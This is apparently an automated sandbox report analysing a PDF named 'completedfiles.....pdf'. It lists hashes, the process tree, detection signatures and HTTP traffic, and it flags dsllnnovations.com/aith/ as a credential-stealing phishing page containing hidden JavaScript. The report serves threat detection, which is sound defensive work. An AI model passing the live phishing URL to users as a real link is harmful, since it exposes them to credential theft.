Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
completedfiles.....pdf

Overview

General Information

Sample name:completedfiles.....pdf
Analysis ID:1545000
MD5:447b4f00cbabfcf1e20e8217542706f0
SHA1:ba7e723a3956d36ac787b427d32961bacf4ba720
SHA256:55a1a40e0c4cdd00c397fe47c25287c497c4f47729eb90ee49889e728bf14b90
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious URL
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 6700 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\completedfiles.....pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 5932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 2256 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1680,i,5364743034394867823,15920541604491222706,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 3864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://dsllnnovations.com/aith/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1896,i,9296518696687026067,6868305486680022474,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://dsllnnovations.com/aith/SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://dsllnnovations.com/aith/HTTP Parser: Base64 decoded: 1730244138.000000
Source: https://dsllnnovations.com/aith/HTTP Parser: No favicon
Source: https://dsllnnovations.com/aith/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:58060 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:58061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:58069 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:58151 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.4:61331 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:58058 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PcYCYYs6TKUBHSY&MD=NVkN5bGa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /aith/ HTTP/1.1Host: dsllnnovations.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dsllnnovations.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dsllnnovations.com/aith/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: dsllnnovations.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
Source: global trafficHTTP traffic detected: GET /aith/ HTTP/1.1Host: dsllnnovations.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://dsllnnovations.com/aith/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js? HTTP/1.1Host: dsllnnovations.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js? HTTP/1.1Host: dsllnnovations.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8da6e8395f456b4c HTTP/1.1Host: dsllnnovations.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PcYCYYs6TKUBHSY&MD=NVkN5bGa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
